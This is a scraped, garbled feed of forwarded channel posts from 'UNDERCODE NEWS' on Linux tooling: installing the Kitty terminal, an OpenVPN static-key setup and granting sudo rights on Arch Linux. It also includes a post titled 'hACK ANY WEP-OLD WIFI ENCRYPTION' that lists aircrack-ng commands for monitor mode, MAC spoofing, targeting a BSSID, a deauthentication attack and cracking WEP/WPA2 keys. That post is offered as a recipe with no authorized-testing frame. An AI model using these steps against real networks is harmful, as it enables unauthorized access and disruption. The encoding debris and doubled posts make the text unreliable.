Forwarded from UNDERCODE NEWS
One point is decided between Washington and Beijing: the strength of the technological firms is underestimated.
#International
#International
β β β Uππ»βΊπ«Δπ¬πβ β β β
4,2 rating free hacking course-- Hacking Academy: How to Monitor & Intercept Transmitted Data:
Learn how to intercept data in networks
Monitor transmitted data
Detect intrusions
See what is going on in your network
Learn how to read and filter data in Wireshark
https://www.udemy.com/course/hacking-academy-monitoring-transmitted-data/
4,2 rating free hacking course-- Hacking Academy: How to Monitor & Intercept Transmitted Data:
Learn how to intercept data in networks
Monitor transmitted data
Detect intrusions
See what is going on in your network
Learn how to read and filter data in Wireshark
https://www.udemy.com/course/hacking-academy-monitoring-transmitted-data/
Udemy
Free Ethical Hacking Tutorial - Hacking Academy: How to Monitor & Intercept Transmitted Data
Learn how to intercept data in your network. Monitor transmitted data and detect intrusion. Free hacking lesson. - Free Course
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Kitty is a powerful GPU based terminal emulator for linux:
Method 1: from the Ubuntu repository
First open a terminal and update your system.
$ sudo apt update
Use apt to install Kitty:
$ sudo apt install kitty -y
Just enter βkittyβ to open it.
$ kitty
Method 2: from ready-made binaries
If you have a Mac or other Linux, just install the pre-built Kitty
banners.
Use the following curl command:
$ curl -L https://sw.kovidgoyal.net/kitty/installer.sh | sh / dev / stdin
The system will install the binary to ~ / .local / kitty.app / bin / directory.
You can simply run it by typing:
$ ~ / .local / kitty.app / bin / kitty
You can also launch kitty by searching applications.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Kitty is a powerful GPU based terminal emulator for linux:
Method 1: from the Ubuntu repository
First open a terminal and update your system.
$ sudo apt update
Use apt to install Kitty:
$ sudo apt install kitty -y
Just enter βkittyβ to open it.
$ kitty
Method 2: from ready-made binaries
If you have a Mac or other Linux, just install the pre-built Kitty
banners.
Use the following curl command:
$ curl -L https://sw.kovidgoyal.net/kitty/installer.sh | sh / dev / stdin
The system will install the binary to ~ / .local / kitty.app / bin / directory.
You can simply run it by typing:
$ ~ / .local / kitty.app / bin / kitty
You can also launch kitty by searching applications.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
OpenVPN USE VPN FROM YOUR CHOICE- LINUX-TERMUX:
1) Open terminal and type
apt-get install openvpn
2) configure
* test vpn
server # openvpn --remote CLIENT --dev tun1 --ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
client # openvpn --remote SERVER --dev tun1 --ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
then check ifconfig
* static key vpn
Server
3) cd /etc/openvpn
4) openvpn --genkey --secret static.key
5) cat > tun0.conf << EOF
6) REMOTE
dev tun0
ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
secret /etc/openvpn/static.key
7) EOF
cp server:/etc/openvpn/static.key client:/etc/openvpn/static.key
Client
cd /etc/openvpn
cat > tun0.conf << EOF
8) SERVER
dev tun0
ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
secret /etc/openvpn/static.key
9) Firewall
UDP:1149
Test on both sides
openvpn --config /etc/openvpn/tun0.conf --verb 6
ref : wiki.debian.org :: openvpn
wiki.archlinux.org :: openvpn
β β β Uππ»βΊπ«Δπ¬πβ β β β
OpenVPN USE VPN FROM YOUR CHOICE- LINUX-TERMUX:
1) Open terminal and type
apt-get install openvpn
2) configure
* test vpn
server # openvpn --remote CLIENT --dev tun1 --ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
client # openvpn --remote SERVER --dev tun1 --ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
then check ifconfig
* static key vpn
Server
3) cd /etc/openvpn
4) openvpn --genkey --secret static.key
5) cat > tun0.conf << EOF
6) REMOTE
dev tun0
ifconfig 10.9.8.1 10.9.8.2 255.255.255.0
secret /etc/openvpn/static.key
7) EOF
cp server:/etc/openvpn/static.key client:/etc/openvpn/static.key
Client
cd /etc/openvpn
cat > tun0.conf << EOF
8) SERVER
dev tun0
ifconfig 10.9.8.2 10.9.8.1 255.255.255.0
secret /etc/openvpn/static.key
9) Firewall
UDP:1149
Test on both sides
openvpn --config /etc/openvpn/tun0.conf --verb 6
ref : wiki.debian.org :: openvpn
wiki.archlinux.org :: openvpn
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π₯ Add, remove and grant sudo rights to Arch Linux users:
1) How to add, remove and grant sudo rights to users on Arch Linux
Make sure you have installed the sudo package by running the following commands as root:
# pacman -Syu
# pacman -S sudo
2) The first command will sync the repositories and update your Arch Linux system to the latest version available.
The second command will install sudo if not already installed.
π¦Then create a new user and add sudo rights to it.
1) / Create a sudo user on Arch Linux.
Run the following command to create a new user, for example undercode:
# useradd --create-home undercode
2) Set a password for the new user:
# passwd undercode
3) We have created a new user named undercode.
We haven't given the user sudo rights yet.
4) You can check if a user is a sudo user or not using the command:
# sudo -lU undercode
Output example:
5) User undercode is not allowed to run sudo on archlinux.
Yes, the user is not yet allowed to perform administrative tasks.
Let's go ahead and give it sudo rights.
To add a regular user to the sudoers list, simply add him to the wheel group.
6) For those of you curious, wheel is a special group on some Unix-like operating systems.
All members to this group are allowed to perform administrative tasks.
The Wheel group is similar to the sudo group on Debian based systems.
We can add users to the sudoers list in two ways.
7) 4The first way is to use the usermod command.
1.1. Add users to the sudoers list using the usermod command on Arch Linux
To add a user to the sudoers list on Arch Linux, run:
# usermod -aG wheel undercode
or
# usermod --append --groups wheel undercode
The above command will add a user named undercode to the "wheel" group.
As mentioned, members of the wheel group can perform administrative tasks using the sudo command.
Then edit the / etc / sudoers file with the command:
# visudo
Find and uncomment the following line (just remove the # at the beginning of the line):
%wheel ALL=(ALL) ALL
Press ESC and type: wq to save the file and exit.
You can also add the user to the sudo group:
# usermod -aG sudo undercode
Edit the / etc / sudoers file:
# visudo
Uncomment the following line:
%sudo ALL=(ALL) ALL
Save the file and exit.
We have added the user undercode to the sudoers list.
Now go to section β1.3. Let's check if the user has sudo access on Arch Linux βand check if the user has sudo rights.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦π₯ Add, remove and grant sudo rights to Arch Linux users:
1) How to add, remove and grant sudo rights to users on Arch Linux
Make sure you have installed the sudo package by running the following commands as root:
# pacman -Syu
# pacman -S sudo
2) The first command will sync the repositories and update your Arch Linux system to the latest version available.
The second command will install sudo if not already installed.
π¦Then create a new user and add sudo rights to it.
1) / Create a sudo user on Arch Linux.
Run the following command to create a new user, for example undercode:
# useradd --create-home undercode
2) Set a password for the new user:
# passwd undercode
3) We have created a new user named undercode.
We haven't given the user sudo rights yet.
4) You can check if a user is a sudo user or not using the command:
# sudo -lU undercode
Output example:
5) User undercode is not allowed to run sudo on archlinux.
Yes, the user is not yet allowed to perform administrative tasks.
Let's go ahead and give it sudo rights.
To add a regular user to the sudoers list, simply add him to the wheel group.
6) For those of you curious, wheel is a special group on some Unix-like operating systems.
All members to this group are allowed to perform administrative tasks.
The Wheel group is similar to the sudo group on Debian based systems.
We can add users to the sudoers list in two ways.
7) 4The first way is to use the usermod command.
1.1. Add users to the sudoers list using the usermod command on Arch Linux
To add a user to the sudoers list on Arch Linux, run:
# usermod -aG wheel undercode
or
# usermod --append --groups wheel undercode
The above command will add a user named undercode to the "wheel" group.
As mentioned, members of the wheel group can perform administrative tasks using the sudo command.
Then edit the / etc / sudoers file with the command:
# visudo
Find and uncomment the following line (just remove the # at the beginning of the line):
%wheel ALL=(ALL) ALL
Press ESC and type: wq to save the file and exit.
You can also add the user to the sudo group:
# usermod -aG sudo undercode
Edit the / etc / sudoers file:
# visudo
Uncomment the following line:
%sudo ALL=(ALL) ALL
Save the file and exit.
We have added the user undercode to the sudoers list.
Now go to section β1.3. Let's check if the user has sudo access on Arch Linux βand check if the user has sudo rights.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
hACK ANY WEP-OLD WIFI ENCRYPTION :
1.1
# airmon-ng --> inspect wireless network devices
1.2
# airmon-ng stop wlan0 OR # ifconfig wlan0 down --> shut down wlan0
1.3
change MAC
ifconfig ? ip ?
1.4 re-start wlan0
airmon-ng start wlan0
hint: rfkill - may cause issue.
1.5 dump avaliable network near.
airodump-ng wlan0
1.6 choose target
airodump-ng βc 1 βw wireless --bssid aa:bb:cc:dd:ee:ff mon0
new window aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
1.7 crack
aircrack-ng -b MAC wireless-01.cap
2. WPA2
2.1
prepare mon0
2.2 capture packets
airodump-ng -c 1 -w abc --bssid 14:E6:E4:AC:FB:20 mon0
2.3 attack router using Deauth
aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33:44:55 mon0
2.4 crack
aircrack-ng -w ./dic/wordlist wirelessattack-01.cap
3. using gerix wifi cracker
it is a frontend for aircrack-ng
β β β Uππ»βΊπ«Δπ¬πβ β β β
hACK ANY WEP-OLD WIFI ENCRYPTION :
1.1
# airmon-ng --> inspect wireless network devices
1.2
# airmon-ng stop wlan0 OR # ifconfig wlan0 down --> shut down wlan0
1.3
change MAC
ifconfig ? ip ?
1.4 re-start wlan0
airmon-ng start wlan0
hint: rfkill - may cause issue.
1.5 dump avaliable network near.
airodump-ng wlan0
1.6 choose target
airodump-ng βc 1 βw wireless --bssid aa:bb:cc:dd:ee:ff mon0
new window aireplay-ng -1 0 -a [BSSID] -h [our Chosen MAC address] -e [ESSID] [Interface]
1.7 crack
aircrack-ng -b MAC wireless-01.cap
2. WPA2
2.1
prepare mon0
2.2 capture packets
airodump-ng -c 1 -w abc --bssid 14:E6:E4:AC:FB:20 mon0
2.3 attack router using Deauth
aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33:44:55 mon0
2.4 crack
aircrack-ng -w ./dic/wordlist wirelessattack-01.cap
3. using gerix wifi cracker
it is a frontend for aircrack-ng
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Infinite Labor Court staff: claim to buy shares from them in the sum of NIS 4.4 million.
#International
#International
Forwarded from UNDERCODE NEWS